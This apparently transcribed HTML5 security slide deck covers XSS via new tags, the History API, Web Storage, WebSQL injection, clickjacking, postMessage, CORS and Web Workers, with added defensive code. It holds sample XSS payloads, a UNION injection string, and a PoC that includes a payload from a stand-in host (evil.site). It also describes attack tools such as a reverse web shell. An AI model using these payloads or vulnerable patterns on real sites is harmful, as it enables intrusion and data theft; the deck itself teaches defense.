Talk about html5 security
Published in: Education, Technology
  1. youstar@insight-labs
  2. Agenda
     - Introduction to HTML5
     - HTML5 threat model
     - Vulnerabilities and defense
     - Tools
     - References
  3. History
     - HTML 1.0: June 1993, never standardized
     - HTML 2.0: November 1995, RFC 1866
     - HTML 3.2: 14 January 1997, W3C Recommendation (the original slide says 1996; the Recommendation is dated 1997)
     - HTML 4.0: 18 December 1997, W3C Recommendation
     - HTML 4.01: 24 December 1999, W3C Recommendation
     - XHTML 1.0: 26 January 2000, W3C Recommendation
     - HTML5: first public working draft in 2008; W3C Candidate Recommendation in December 2012
  4. Features: the three aspects of HTML5
     - Content (HTML): new tags and attributes
     - Presentation of content (CSS)
     - Interaction with content (JavaScript): new APIs such as drag and drop, localStorage, Web Workers, etc.
  5. Features
  6. HTML5 threat model
     - XSS abuse with new tags and attributes
     - Hiding the URL (History API)
     - Code stealing from client-side storage
     - Injecting into and exploiting WebSQL
     - ClickJacking and CookieJacking
     - Cross-origin requests and postMessage
     - Client-side file includes
     - Botnets and widgets
  7. What is in and what is out
     In:
     - New tags: <video>, <audio>, <article>, <footer>, <nav> (the original slide also lists <button>, which already existed in HTML 4)
     - New attributes on <input>: autocomplete, autofocus, pattern (yes, a regular expression)
     - New media events
     - New <canvas> tag for 2D rendering
     - New form controls for date and time
     - Geolocation
     - New selectors (querySelector / querySelectorAll)
     - Client-side storage: localStorage, sessionStorage and WebSQL
     Out:
     - Presentation elements such as <font>, <center>
     - Presentation attributes such as align, border
     - <frame>, <frameset>
     - <applet>
     - Old special effects: <marquee>, <bgsound>
     - <noscript> appears in this list on the original slide, but it is still part of HTML5
  8. Attack and defense
     Attack:
     - New XSS vectors: event handlers on the new tags (<video>, <audio>, <source>) and attributes such as autofocus that fire a handler without user interaction
     - Bypass blacklist filters that only know the HTML 4 tag and attribute set
     Defense:
     - Add the new tags and attributes to the blacklist and update the regex (the slide's advice)
     - A blacklist is always one new vector behind the spec; an allowlist of permitted tags and attributes plus context-aware output encoding does not have that problem
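The difference between the two defenses on slide 8, as an added example that is not part of the original deck: a blacklist written for the HTML 4 tag set against three HTML5-shaped payloads (the payloads and both filters are constructed here, and the filters are deliberately small stand-ins for real sanitizers).

```javascript
// Added example: an HTML 4-era blacklist misses HTML5 XSS vectors; an allowlist does not.
// Runs under Node.js. Both "sanitizers" are small stand-ins, not a real library.

// A typical pre-HTML5 blacklist: strip <script>/<iframe>/..., javascript: URLs, and
// on* handlers on the tags the filter author knew about.
const BLACKLIST = [
  /<\s*\/?\s*(script|iframe|object|embed|applet)\b[^>]*>/gi,
  /javascript\s*:/gi,
  /<\s*(img|a|body|div|form)\b[^>]*\son\w+\s*=[^>]*>/gi,
];

function blacklistFilter(html) {
  let out = html;
  for (const re of BLACKLIST) out = out.replace(re, '');
  return out;
}

// Allowlist: only these tags survive, and only these attributes on them.
// Every other tag and every on* handler is dropped, whatever the spec adds later.
const ALLOWED_TAGS = new Set(['b', 'i', 'p', 'a', 'ul', 'li']);
const ALLOWED_ATTRS = { a: new Set(['href']) };

function allowlistFilter(html) {
  return html.replace(/<\s*(\/?)\s*([a-z0-9]+)([^>]*)>/gi, (m, slash, tag, attrs) => {
    tag = tag.toLowerCase();
    if (!ALLOWED_TAGS.has(tag)) return '';
    if (slash) return `</${tag}>`;
    const kept = [];
    const attrRe = /([a-z-]+)\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)/gi;
    let a;
    while ((a = attrRe.exec(attrs)) !== null) {
      const name = a[1].toLowerCase();
      const val = a[2].replace(/^['"]|['"]$/g, '');
      if (!(ALLOWED_ATTRS[tag] || new Set()).has(name)) continue;
      if (name === 'href' && !/^(https?:\/\/|\/)/i.test(val)) continue; // no javascript:/data:
      kept.push(`${name}="${val.replace(/"/g, '&quot;')}"`);
    }
    return `<${tag}${kept.length ? ' ' + kept.join(' ') : ''}>`;
  });
}

// Constructed HTML5 payloads (well-known vector shapes; not taken from the slides).
const HTML5_VECTORS = [
  '<video><source onerror="alert(1)"></video>',
  '<input autofocus onfocus="alert(1)">',
  '<audio src=x onerror="alert(1)">',
];

// True if the filtered output still carries an inline event handler.
function stillHasHandler(html) {
  return /\son[a-z]+\s*=/i.test(html);
}

// For one payload: does a handler survive each filter?
function compare(payload) {
  return {
    blacklist: stillHasHandler(blacklistFilter(payload)),
    allowlist: stillHasHandler(allowlistFilter(payload)),
  };
}
```

For every payload in HTML5_VECTORS the blacklist leaves the handler in place and the allowlist removes it; the blacklist still catches the HTML 4 cases it was written for, which is exactly why such filters survive in production long after they stop being adequate.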
  9. Hiding the URL with the History API
     DOM (pre-HTML5):
     - window.history.back(); window.history.forward(); window.history.go(n);
     HTML5:
     - history.pushState(stateObject, title, url): adds a history entry and rewrites the address bar without loading anything
     - history.replaceState(stateObject, title, url): the same as pushState, but modifies the current history entry
     The url must be same-origin, so a payload cannot spoof another site, but it can erase the query string that delivered it.
  10. PoC: a reflected XSS payload that removes itself from the address bar as soon as it runs. The original slide wrote history.pushState({},,...); an empty argument is a JavaScript syntax error, so the title argument is given here as "".
     http://127.0.0.1/html5/poc/history/xsspoc.php?xss=<script>history.pushState({},"",location.href.split("?").shift());document.write(1)</script>
     After the script runs the address bar shows only:
     http://127.0.0.1/html5/poc/history/xsspoc.php
  11. Web Storage
     Types:
     - localStorage: long-term storage, persists until the application or the user clears it
     - sessionStorage: per-tab session storage, cleared when the browser (tab) is closed
     Differences from cookies:
     - Cookies: about 4 KB each, sent to the server with every request
     - localStorage / sessionStorage: limit depends on the browser (usually 5 MB), never sent to the server, readable only by script running on the same origin
     Support: Firefox 3.5, Safari 4.0, IE8, Google Chrome, Opera 10.50
  12. Functions
     - (localStorage | sessionStorage).setItem(key, value)
     - (localStorage | sessionStorage).getItem(key)
     - (localStorage | sessionStorage).removeItem(key) (the original slide says deleteItem(), which does not exist)
     - (localStorage | sessionStorage).clear()
     - length and key(index) allow a script to enumerate everything stored
  13. Attack and defense
     Attack:
     - Get the data from storage (tokens, passwords, cached data): any XSS on the origin can read all of it, and there is no HttpOnly equivalent
     - Store your XSS payload in storage so it runs again every time the application reads the value back into the DOM (persistent client-side XSS)
     - No path limit: storage is keyed by origin only, so an XSS on any page of the origin reaches all of it, whereas a cookie can at least be narrowed with the Path attribute
     Defense:
     - Don't store sensitive data in local storage
     - Don't use local storage for session identifiers
     - Stick with cookies and use the HttpOnly and Secure flags
  14. Database storage (WebSQL)
     - The same model as the Google Gears database API
     Operate:
     - var db = openDatabase("Database Name", "Database Version", "Database Description", estimatedSizeInBytes);
     - db.transaction(function (tx) { tx.executeSql("YOUR SQL STATEMENT HERE", [params], successCallback, errorCallback); });
     Type:
     - SQLite (supported by WebKit browsers; Firefox never implemented WebSQL and the W3C stopped work on the specification in 2010)
  15. Attack and defense
     Attack:
     - Store a payload in the database so the application re-renders it later
     - Client-side SQL injection through string-concatenated statements
     Defense:
     - Stick to parameterized executeSql() calls (? placeholders with an argument array)
     - Encode query results before inserting them into the DOM
     - Don't store sensitive data
  16. Store shellcode
  17. SQL injection
     Use sqlite_master to enumerate the schema (the original slide omits the quotes around the string literals):
     - SELECT name FROM sqlite_master WHERE type='table'
     - SELECT sql FROM sqlite_master WHERE name='table_name'
     - SELECT sqlite_version()
     Concatenation versus placeholders:
     - executeSql("SELECT name FROM stud WHERE id=" + input_id);      // vulnerable
     - executeSql("SELECT name FROM stud WHERE id=?", [input_id]);    // correct
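The two executeSql() shapes from slide 17 side by side, as an added example that is not part of the original deck. Node.js has no WebSQL, so the transaction object is a constructed stand-in that only records the statement text and bound arguments the database would receive; the table name, the attacker input and the helper names are assumed.

```javascript
// Added example: client-side SQL injection through string concatenation versus a
// bound parameter, observed through a stand-in SQLTransaction.

// Stand-in for the object a db.transaction(callback) hands to the callback.
function fakeTx() {
  const calls = [];
  return {
    calls,
    executeSql(sql, args = [], onSuccess, onError) {
      calls.push({ sql, args });   // a real tx would run this against SQLite
    },
  };
}

// Vulnerable: the id becomes part of the statement.
function lookupVulnerable(tx, inputId) {
  tx.executeSql('SELECT name FROM stud WHERE id=' + inputId);
}

// Correct: the id travels as a bound parameter and cannot change the statement.
function lookupSafe(tx, inputId) {
  tx.executeSql('SELECT name FROM stud WHERE id=?', [inputId]);
}

// Defense in depth: an id is a number, so reject anything else before it
// reaches the database at all.
function parseId(input) {
  const n = Number(input);
  return Number.isInteger(n) && n >= 0 ? n : null;
}

// Constructed attacker input: a UNION that reads table definitions from sqlite_master.
const INJECTION = "0 UNION SELECT sql FROM sqlite_master WHERE type='table'";

// Returns what each variant would send to the database for the same input.
function demo(input = INJECTION) {
  const v = fakeTx();
  lookupVulnerable(v, input);
  const s = fakeTx();
  lookupSafe(s, input);
  return {
    vulnerableSql: v.calls[0].sql,     // the UNION is now part of the statement
    safeSql: s.calls[0].sql,           // statement text is unchanged
    safeArgs: s.calls[0].args,         // the whole payload is just a string value
    validatedId: parseId(input),       // null: rejected before any query
  };
}
```

With the placeholder form SQLite compares the column against the literal string `0 UNION SELECT ...`, matches nothing, and the schema stays private; the concatenated form hands the attacker a second SELECT.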
  18. Drag and drop basics
     - Drag data (dataTransfer), the drag feedback image, drag effects
     - Drag events: dragstart, dragenter, dragover, dragleave, drag, drop, dragend
  19. ClickJacking
     - XSS + drag: the victim is tricked into dragging data from a framed page (or from the page's own form fields) into an attacker-controlled element, which moves content across origins without any script being allowed to read the frame
  20. CookieJacking (Rosario Valotta)
     - Combines several techniques to steal the user's local cookie files
     Techniques:
     - How to read the local file: an <iframe> pointed at a file:// URL
     - How to detect the state of the cookies: clickjacking, so that the victim selects and drags the cookie text out of the frame
     - How to send the cookies: SMB
  21. Defense
     - Use <iframe sandbox> for content you embed
     - Frame-busting: if (top !== window) top.location = window.location.href;
     - Equivalent form: if (top != self) top.location.href = self.location.href;
     - Caveat not on the original slide: frame-busting script can be defeated, for instance by loading the page inside a sandboxed <iframe> without allow-top-navigation, which prevents the script from changing top.location; send the X-Frame-Options header (DENY or SAMEORIGIN) as well so the browser refuses to frame the page at all
  22. postMessage
     Send:
     - otherWindow.postMessage(message, targetOrigin);  // give the real origin as targetOrigin, not "*", or the message is delivered to whatever is loaded in that window
     Receive:
     window.addEventListener("message", receiveMessage, false);
     function receiveMessage(event) {
       if (event.origin !== "http://example.org:8080") return;
       // ...
     }
  23. Defense
     - Check event.origin against the exact expected value (a substring or prefix match accepts look-alike origins)
     - Don't use innerHTML:
       Element.innerHTML = e.data;    // dangerous
       Element.textContent = e.data;  // safe
     - Don't use eval() to deal with the message; parse it as JSON and validate the fields
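A receiver that applies all three defenses from slide 23, as an added example that is not part of the original deck. It runs under Node.js by driving the handler with constructed MessageEvent-like objects; the trusted origin, the message schema and the sink object are assumptions, and in a browser the handler is registered with window.addEventListener("message", ...).

```javascript
// Added example: a postMessage receiver with an exact origin check, JSON parsing
// instead of eval(), and a text-only sink instead of innerHTML.

const TRUSTED_ORIGIN = 'https://widget.example';   // assumed partner origin

// Exact comparison. origin.indexOf('widget.example') !== -1 would also accept
// https://widget.example.attacker.net, which is the classic mistake.
function isTrustedOrigin(origin) {
  return origin === TRUSTED_ORIGIN;
}

// Parse without eval: JSON only, and only the fields we expect, with types checked.
function parseMessage(data) {
  let obj;
  try {
    obj = typeof data === 'string' ? JSON.parse(data) : data;
  } catch (e) {
    return null;                                    // not JSON: refused, never executed
  }
  if (!obj || typeof obj !== 'object') return null;
  if (obj.type !== 'greeting' || typeof obj.name !== 'string' || obj.name.length > 64) return null;
  return { type: obj.type, name: obj.name };
}

// `sink` stands in for the DOM element being updated; only textContent is written,
// so markup inside the message is displayed literally instead of being parsed.
function handleMessage(event, sink) {
  if (!isTrustedOrigin(event.origin)) return { accepted: false, reason: 'origin' };
  const msg = parseMessage(event.data);
  if (!msg) return { accepted: false, reason: 'schema' };
  sink.textContent = 'Hello, ' + msg.name;         // never sink.innerHTML
  return { accepted: true };
}

// Browser wiring (not executed under Node):
// window.addEventListener('message', (e) => handleMessage(e, document.getElementById('out')), false);

// Constructed events for the demonstration.
const EVENTS = {
  good: { origin: TRUSTED_ORIGIN, data: JSON.stringify({ type: 'greeting', name: 'Alice' }) },
  lookalike: { origin: 'https://widget.example.attacker.net', data: '{"type":"greeting","name":"x"}' },
  markup: { origin: TRUSTED_ORIGIN, data: JSON.stringify({ type: 'greeting', name: '<img src=x onerror=alert(1)>' }) },
  code: { origin: TRUSTED_ORIGIN, data: 'alert(1)' },
};
```

The markup case is the interesting one: it passes both the origin and schema checks, and that is fine, because the sink treats it as text. The receiver does not have to recognise every payload shape, it only has to never hand message data to an HTML or JavaScript parser.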
  24. Cross-Origin Resource Sharing
     - Originally Ajax calls were subject to the same-origin policy: Site A cannot make (or rather, cannot read the response of) XMLHttpRequests to Site B
     - HTML5-era browsers (XHR Level 2) make these cross-domain calls possible when Site B opts in
     - Site A -> Site B: Site B's response must include the headers
     - Access-Control-Allow-Origin: <origin of Site A>  (required)
     - Access-Control-Allow-Credentials: true | false  (whether cookies and HTTP auth are sent and the response is readable; browsers refuse it in combination with Allow-Origin: *)
     - Access-Control-Expose-Headers: ...
     - etc.
  25. Defense
     - Don't set Access-Control-Allow-Origin: * on anything that is not public data (the same mistake as an open Flash crossdomain.xml)
     - Echoing back whatever Origin the request carries is just as bad as *; compare it against a fixed list first:
       if ($origin == "Site A") { header("Access-Control-Allow-Origin: Site A"); ... // process request }
     - Prevent DDoS (the slide's wording): do the origin check before any other work so that requests from unknown origins cost the server nothing
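The origin check from slide 25 written as a testable function, alongside the two ways of getting it wrong that the slide warns about. This is an added example, not the deck's own code; the allowlisted origins are assumed values, and the readability check at the end is a simplified model of the browser's CORS decision, not the browser itself.

```javascript
// Added example: server-side CORS headers from an allowlist, compared with a
// wildcard and with reflecting the request's Origin header. Plain Node.js.

const ALLOWED_ORIGINS = new Set([
  'https://site-a.example',
  'https://app.site-a.example',
]);

// Returns the CORS response headers for a request carrying `originHeader`, or an
// empty object when the origin is not allowed (the browser then blocks the
// cross-origin read, which is the default we want).
function corsHeaders(originHeader, { credentials = false } = {}) {
  if (typeof originHeader !== 'string' || !ALLOWED_ORIGINS.has(originHeader)) return {};
  const h = {
    'Access-Control-Allow-Origin': originHeader,   // the exact allowed origin, never "*"
    'Vary': 'Origin',                               // caches must key on Origin once the answer varies
  };
  if (credentials) h['Access-Control-Allow-Credentials'] = 'true';
  return h;
}

// Anti-patterns, kept for comparison. Reflecting the Origin reproduces the effect
// of "*" while looking deliberate.
function corsWildcard() { return { 'Access-Control-Allow-Origin': '*' }; }
function corsReflect(originHeader) { return { 'Access-Control-Allow-Origin': originHeader }; }

// Simplified model of the browser's check: may a page at `origin` read the
// response produced by `policy`? (`credentials` = request made withCredentials.)
function readableBy(policy, origin, credentials) {
  const h = policy(origin);
  const acao = h['Access-Control-Allow-Origin'];
  if (!acao) return false;
  if (credentials && acao === '*') return false;                          // browsers reject this pairing
  if (credentials && h['Access-Control-Allow-Credentials'] !== 'true') return false;
  return acao === '*' || acao === origin;
}

// Minimal http wiring (not started here):
// require('http').createServer((req, res) => {
//   res.writeHead(200, { 'Content-Type': 'application/json',
//                        ...corsHeaders(req.headers.origin, { credentials: true }) });
//   res.end(JSON.stringify({ ok: true }));
// }).listen(8080);
```

The reflect policy is the one to look for in code review: it passes every manual test (the developer's own origin always works) and lets any site read the authenticated response.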
  26. Client-side file include
     Code like this:
     <html><body>
     <script>
     x = new XMLHttpRequest();
     x.open("GET", location.hash.substring(1));
     x.onreadystatechange = function () {
       if (x.readyState == 4) {
         document.getElementById("main").innerHTML = x.responseText;
       }
     };
     x.send();
     </script>
     <div id="main"></div>
     </body></html>
     PoC (introducing cross-origin requests):
     http://example.com/#http://evil.site/payload.php
     The contents of payload.php are fetched with a cross-origin XHR (evil.site answers with Access-Control-Allow-Origin: *) and written as HTML into <div id="main">: a new type of XSS. The fragment is never sent to example.com's server, so nothing server-side ever sees the payload.
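A hardened version of the include snippet from slide 26, as an added example that is not part of the original deck. The fragment is resolved against the page's own origin, anything cross-origin or outside an allowed directory is refused, and the response goes into textContent rather than innerHTML. The directory prefix is an assumption; the resolver runs under Node.js (which provides the URL class) and the browser wiring is shown in comments.

```javascript
// Added example: validate a hash-fragment include before fetching it, so that
// http://example.com/#http://evil.site/payload.php loads nothing.

const ALLOWED_PREFIX = '/fragments/';   // assumed directory of includable files

// Returns the absolute URL to fetch, or null when the fragment must not be loaded.
function resolveInclude(fragment, pageUrl) {
  if (!fragment) return null;
  let target;
  try {
    target = new URL(fragment, pageUrl);           // relative paths resolve against the page
  } catch (e) {
    return null;
  }
  const page = new URL(pageUrl);
  if (target.origin !== page.origin) return null;            // blocks http://evil.site/... and //evil.site/...
  if (!target.pathname.startsWith(ALLOWED_PREFIX)) return null; // blocks /, /admin, and ../ after normalisation
  if (target.pathname.includes('..')) return null;           // belt and braces for odd encodings
  return target.href;
}

// Browser wiring (not executed under Node):
// const url = resolveInclude(location.hash.substring(1), location.href);
// if (url) {
//   const x = new XMLHttpRequest();
//   x.open('GET', url);
//   x.onreadystatechange = function () {
//     if (x.readyState === 4 && x.status === 200) {
//       document.getElementById('main').textContent = x.responseText;  // text, not markup
//     }
//   };
//   x.send();
// }
```

If the included files really are HTML fragments that must render as markup, textContent is not enough on its own and the fetched content needs the same allowlist sanitisation as any other untrusted HTML; the origin and path checks still remove the cross-origin include entirely.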
  27. Web Workers
     - Run scripts in the background, independently of the page's UI thread
     - Very simple:
       var w = new Worker("some_script.js");
       w.onmessage = function (e) { /* handle the worker's result */ };
       w.terminate();
     - Can access: XHR, the navigator object, the application cache; can spawn other workers
     - Can't access: the DOM, window, document
  28. Attack
     - Botnet: a page (or a widget it embeds) keeps a worker running in every visitor's browser
       - Application-level DDoS
       - Email spam
       - Distributed password cracking
     - Network scanning from inside the visitor's LAN
     - Guessing the user's private IP address
       - Identify the user's subnet
       - Identify the IP address
  29. CORS + XSS + Workers = Shell of the Future
  30. Tools
     HTML5CSdump:
     - Uses the enumeration and extraction techniques described before to obtain all the client-side storage belonging to a given domain name
     JS-Recon:
     - Port scans, network scans and private IP address detection, all from JavaScript (XHR and WebSocket timing)
  31. Imposter:
     - Steal cookies, set cookies, steal Local Shared Objects (Flash), steal stored passwords from Firefox, etc.
     Shell of the Future:
     - Reverse web shell handler: the attacker's requests are tunnelled through the victim's XSSed browser, so the requests carry the victim's IP and User-Agent
     - Bypasses anti-session-hijacking measures that bind the session to those values
  32. Ravan
     - JavaScript-based distributed computing system
     - Hashing algorithms: MD5, SHA1, SHA256, SHA512
  33. References
     - HTML5 带来的新安全威胁 (New security threats brought by HTML5): xisigr
     - Attacking with HTML5: lavakumark
     - Abusing HTML5: Ming Chow
     - HTML5 Web Security: Thomas Röthlisberger
     - Abusing HTML 5 Structured Client-side Storage: Alberto Trivero
     - Cookiejacking: Rosario Valotta
     - http://heideri.ch/jso/#html5
     - http://www.wooyun.org/bugs/wooyun-2011-02351
     - http://shreeraj.blogspot.com/2011/03/html-5-xhr-l2-and-dom-l3-top-10-attacks.html
     - http://www.html5test.com
  34. References (continued)
     - http://hi.baidu.com/xisigr/blog/item/aebf0728abd960f299250abe.html
     - http://blog.whatwg.org/whats-next-in-html-episode-2-sandbox
     - http://code.google.com/intl/zh-CN/apis/gears/api_database.html
     - http://michael-coates.blogspot.com/2010/07/html5-local-storage-and-xss.html
     - http://www.w3.org/TR/access-control/
     - http://m-austin.com/blog/?p=19
     - https://developer.mozilla.org/en/
     - http://www.w3.org/TR/cors/
     - http://www.andlabs.org/tools/ravan.html
     - http://www.gnucitizen.org/blog/client-side-sql-injection-attacks/
  35. Contact me
     - Email: youstar@foxmail.com
     - Sites: www.codesec.info, www.insight-labs.org